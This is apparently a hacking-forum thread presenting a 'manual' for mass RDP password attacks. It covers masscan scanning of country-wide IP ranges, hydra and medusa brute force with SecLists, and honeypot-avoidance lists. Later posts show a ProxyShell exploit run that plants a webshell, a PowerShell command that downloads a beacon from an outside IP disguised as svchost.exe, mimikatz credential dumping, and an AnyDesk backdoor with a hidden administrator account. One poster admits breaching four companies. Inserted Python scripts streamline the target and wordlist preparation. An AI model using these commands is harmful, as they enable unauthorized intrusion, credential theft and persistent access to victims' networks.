
Manual/Book: RDP attack

Prokhorenco (registered 18.02.2023)
A simple Remote Desktop (RDP) password attack method.

Download passwords:
Bash:
git clone https://github.com/danielmiessler/SecLists.git

Output all usernames into one file:
Bash:
find SecLists/Usernames/ -type f -exec cat {} + > usernames.txt

Output all passwords into one file:
Bash:
find SecLists/Passwords/ -type f -exec cat {} + > passwords.txt

Scan for RDP:
Bash:
sudo masscan -Pn -sS -iL ranges.txt --rate 6000 -p3389 --open-only --excludefile block.txt | grep -Eo '[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+' > targets.txt

Password attack:
Bash:
hydra -L usernames.txt -P passwords.txt -M targets.txt -t 16 rdp -o results

ranges.txt: https://lite.ip2location.com/ip-address-ranges-by-country
block.txt: https://gist.github.com/ozuma/fb21ab0f7143579b1f2794f4af746fb2
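An added example (not from the post above) for the wordlist-merging step: the `find -type f -exec cat` commands also pull in SecLists' README.md and similar non-list files, keep CRLF line endings and write every duplicate, all of which end up as wasted login attempts later. This Python script merges only .txt files under a directory, strips line endings, drops blank lines and duplicates while preserving first-seen order, and writes one clean list. The directory layout and entries built in demo() are constructed for the example and are not taken from SecLists.

```python
import tempfile
from pathlib import Path


def merge_wordlists(root, out_path, suffixes=(".txt",)):
    """Merge every wordlist under `root` into one file at `out_path`.

    Files are read in sorted path order; only files whose suffix is in
    `suffixes` are used (so README.md, LICENSE etc. are skipped). CR/LF is
    stripped, blank and whitespace-only lines are dropped, and duplicates are
    removed with the first occurrence winning. Returns the kept entries.
    """
    seen = set()
    kept = []
    files = sorted(p for p in Path(root).rglob("*") if p.is_file())
    for path in files:
        if path.suffix.lower() not in suffixes:
            continue
        # SecLists mixes encodings; latin-1 maps every byte 1:1 and never fails
        with path.open("r", encoding="latin-1", newline="") as fh:
            for line in fh:
                word = line.rstrip("\r\n")
                if not word.strip() or word in seen:
                    continue
                seen.add(word)
                kept.append(word)
    with open(out_path, "w", encoding="latin-1", newline="\n") as out:
        for word in kept:
            out.write(word + "\n")
    return kept


def demo():
    """Build a constructed SecLists-like tree, merge it, return (entries, file text)."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp) / "Usernames"
        (root / "Names").mkdir(parents=True)
        # constructed sample files: a README that must be skipped, CRLF endings,
        # a blank line, and duplicates within and across files
        (root / "README.md").write_bytes(b"# Usernames\nadmin\n")
        (root / "top-usernames-shortlist.txt").write_bytes(
            b"root\r\nadmin\r\n\r\nadministrator\r\nadmin\r\n")
        (root / "Names" / "names.txt").write_bytes(b"guest\nroot\n")
        out = Path(tmp) / "usernames.txt"
        kept = merge_wordlists(root, out)
        return kept, out.read_text(encoding="latin-1")


if __name__ == "__main__":
    words, text = demo()
    print(f"{len(words)} unique entries")
    print(text, end="")
```

Point it at SecLists/Usernames or SecLists/Passwords instead of the temporary tree to get the real lists; note that the full Passwords tree is tens of millions of lines, far more than a service with account lockout will ever let you try, so trim the output to a short list before use.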
 
Usually I use "./masscan -iL list.txt -p 3389 --exclude 1.2.3.4 --rate 400000 -oG 3389.txt --open"; the scanning server dies in a few hours.
I will try it with block.txt to see what happens, but isn't your rate (--rate 6000) small?

And I want to test this:
nmap -iL ranges.txt -Pn -n --open -p3389 --script-timeout 20s --script=rdp-vuln-ms12-020,rdp-enum-encryption,rdp-ntlm-info --min-hostgroup 100 -g 53 --scan-delay 5 > targets.txt

Internal scans: set to 88 for Kerberos
External scans: set to 53 for DNS
Delay 0-5
 
I'm finding that medusa [1] works better for me than hydra. Yes, 6000 is small, but it's only an example; change it as you see fit.

[1] https://www.kali.org/tools/medusa

Bash:
medusa -U usernames.txt -P passwords.txt -H targets.txt -M rdp -O results.txt
block.txt is meant to block known honeypot IP ranges. Won't cover everything though.
 
Can hydra or medusa give better results than NLBrute or z668?
For me, hydra is the best for that.
 
So, after getting some number of valid credential pairs, what post-exploitation framework/tool can you suggest? Thanks.
I like PoshC2. The command and control framework is great and easy to run on a VPS, very easy to proxy, plus it's free. But (like most open-source C2s) the default implants are trash. You can find some cryptors or use stuff like Unicorn, etc., but most AV will spot it. You're better off writing your own implant that you can command and control from Posh.
 
Got it, thanks mates for the suggestions and links to post-exploitation tools.
I've tried to use Havoc and was not so lucky with that framework (when creating a new payload I get an error message about the x64 compiler, even though all my environments are x64 or ARM M1). So I will check other ones.

By the way, to find IP ranges with that ip2location service (which the topic starter mentioned), I've created a brief step-by-step manual; hopefully it will be useful to somebody:
1. Go to http://lite.ip2location.com/ip-address-ranges-by-country, log in/sign up and select the desired country
2. Download the IP2LOCATION-LITE-DB1.CSV.ZIP file (and yes, it includes all countries)
3. Clone the converter from GitHub:
git clone https://github.com/ip2location-python-csv-converter
4. Move into the downloaded local directory
5. Install one Python dependency module (ipaddress, I believe)
6. Execute:
python ip2location-csv-converter.py -cidr -append IP2LOCATION-LITE-DB1.CSV IP2LOCATION-CIDR.CSV
7. Now create a list with only the country you want to audit, using awk:
cat IP2LOCATION-CIDR.CSV | grep India | awk -F ',' '{print $3}' | tr -d '"' > ip_range_India.txt

I know this is pretty obvious, so don't blame me too much; I spent at least 40 minutes to get it working and start using it.

peace to everyone
 
How can you split one file (all.txt) with 20499504 IPs into multiple files like file1.txt, file2.txt, etc.?
I use "split all.txt -l 5" and the result is below:
xzzziqazn xzzzhtspb xzzzgxkhy xzzzgbcaa xzzzfetrb xzzzeilly xzzzdmddt xzzzcpuul xzzzbtmmr xzzzaxecw xzzzaavvd xzzdnmz

du -sh ~/now/
19G /root/now/
 
split all.txt -l 5 -d file --additional-suffix '.txt'
 
I just copy and paste, remove the noise and add '-' to the CIDR ranges. See my example for Chinese IP ranges: https://pastebin.com/raw/8Rke96BE
 

Attachment: china.txt (114.2 KB)
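An added example (not the poster's converter and not code from either post above) that does the ip2location work from steps 6 and 7 and the "add '-'" step in plain Python: it filters IP2LOCATION-LITE-DB1.CSV rows by country code, turns the integer first/last columns into minimal CIDR blocks with the standard ipaddress module, emits the "first-last" form as well, and subtracts a block.txt-style exclusion list so excluded ranges never reach the target file. The CSV rows embedded in SAMPLE_DB1 are constructed for the example; the country assignments are invented, not real allocations.

```python
import csv
import io
import ipaddress

# Constructed sample rows in the IP2LOCATION-LITE-DB1.CSV layout:
# "ip_from","ip_to","country_code","country_name", addresses as integers.
# The allocations below are invented for the example.
SAMPLE_DB1 = (
    '"0","16777215","-","-"\n'
    '"16777216","16777471","AU","Australia"\n'
    '"16777472","16778239","CN","China"\n'
    '"16778240","16779263","AU","Australia"\n'
    '"16779264","16781311","CN","China"\n'
)


def country_ranges(csv_text, country_code):
    """Yield (first, last) IPv4Address pairs for rows tagged country_code."""
    for row in csv.reader(io.StringIO(csv_text)):
        if len(row) < 3 or row[2] != country_code:
            continue
        yield ipaddress.IPv4Address(int(row[0])), ipaddress.IPv4Address(int(row[1]))


def to_cidrs(csv_text, country_code):
    """Collapse a country's rows into the minimal sorted list of CIDR blocks."""
    nets = []
    for first, last in country_ranges(csv_text, country_code):
        nets.extend(ipaddress.summarize_address_range(first, last))
    return [str(n) for n in ipaddress.collapse_addresses(nets)]


def to_dash_ranges(csv_text, country_code):
    """The same rows as 'first-last' strings."""
    return [f"{first}-{last}" for first, last in country_ranges(csv_text, country_code)]


def exclude_blocks(cidrs, blocked):
    """Remove every address in `blocked` (a block.txt-style list) from `cidrs`.

    Two CIDR blocks are either nested or disjoint, so each pair is one of three
    cases: no overlap (keep), blocked block inside the target (carve it out with
    address_exclude) or target inside/equal to the blocked block (drop).
    """
    remaining = [ipaddress.ip_network(c) for c in cidrs]
    for block in (ipaddress.ip_network(b) for b in blocked):
        kept = []
        for net in remaining:
            if not net.overlaps(block):
                kept.append(net)
            elif block.subnet_of(net):
                kept.extend(net.address_exclude(block))
            # else: net lies within block and is dropped
        remaining = kept
    return [str(n) for n in ipaddress.collapse_addresses(remaining)]


def address_count(cidrs):
    """Total number of addresses covered by a list of CIDR strings."""
    return sum(ipaddress.ip_network(c).num_addresses for c in cidrs)


if __name__ == "__main__":
    targets = exclude_blocks(to_cidrs(SAMPLE_DB1, "CN"), ["1.0.8.0/24"])
    print("\n".join(targets))
    print(address_count(targets), "addresses")
```

Read the real CSV with `open("IP2LOCATION-LITE-DB1.CSV").read()` in place of SAMPLE_DB1 and write the returned list one entry per line; masscan accepts both the CIDR and the first-last forms in -iL files, and doing the exclusion here makes the target list itself clean instead of relying on --excludefile at scan time.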
Nope, it still works. There are so many RDPs deployed with simple passwords created during testing time; the only issue is, out of the number of RDPs you get, how to find the valuable servers. I followed the author's CVE-2021-34473 article and recreated it for the SEA region; I got access into 4 valid corps, but I'm still trying to figure out what to do with all that access. These threads are very helpful for people like me who are just starting on network pentesting.
 
Gain initial access with CVE-2021-34473.
Code:
user@host:~$ python3 proxyshell-auto/proxyshell.py -t 10.10.10.11
fqdn srvexchange2016.domain.local
+ Administrator@domain.com
legacyDN /o=COMPANY/ou=Exchange Administrative Group (FYDIBOHF23SPDLT)/cn=Recipients/cn=cc84dab2b5f8407ea1545e2f024382aa-Administrator
leak_sid S-1-5-21-654894352-2732664023-2722231124-500
token VgEAVAdXaW5kb3dzQwBBCEtlcmJlcm9zTBxBZG1pbmlzdHJhdGV1ckBwZWNoZXhwb3J0Lm1nVSxTLTEtNS0yMS02NTQ4OTQzNTItMjczMjY2NDAyMy0yNzIyMjMxMTI0LTUwMEcBAAAABwAAAAxTLTEtNS0zMi01NDRFAAAAAA==
set_ews Success with subject grvshwaveotkomvc
write webshell at aspnet_client/yhuzv.asPx
<Response [404]>
nt authority\system
SHELL>
Now that you have a shell, throw a beacon into the network.
Code:
powershell.exe Invoke-WebRequest -Uri "http://198.42.135.87:8000/beacon.exe" -OutFile "C:\windows\TEMP\svchost.exe"
Now run the beacon.
Code:
powershell.exe "C:\windows\TEMP\svchost.exe"

Now you have a beacon on someone's Exchange server. From here I like to run sekurlsa::logonpasswords and lsadump::sam using mimikatz. I often find the domain admin credentials this way; I then start spraying these credentials on all network shares to see where else I can move to and access, using SoftPerfect Network Scanner.

Sometimes you will see the company using AnyDesk, so you can do the following.
Set your AnyDesk password.
Code:
cmd.exe /c echo skalfhgd63iAPE | C:\ProgramData\AnyDesk\AnyDesk.exe --set-password
Create a local user and hide its folder in properties.
Code:
net user oldadmin "skalfhgd63iAPE" /add
net localgroup Administrators oldadmin /ADD
reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\Userlist" /v oldadmin /t REG_DWORD /d 0 /f
Fetch the AnyDesk ID and connect.
Code:
cmd.exe /c C:\ProgramData\AnyDesk\AnyDesk.exe --get-id

Very basic example.
 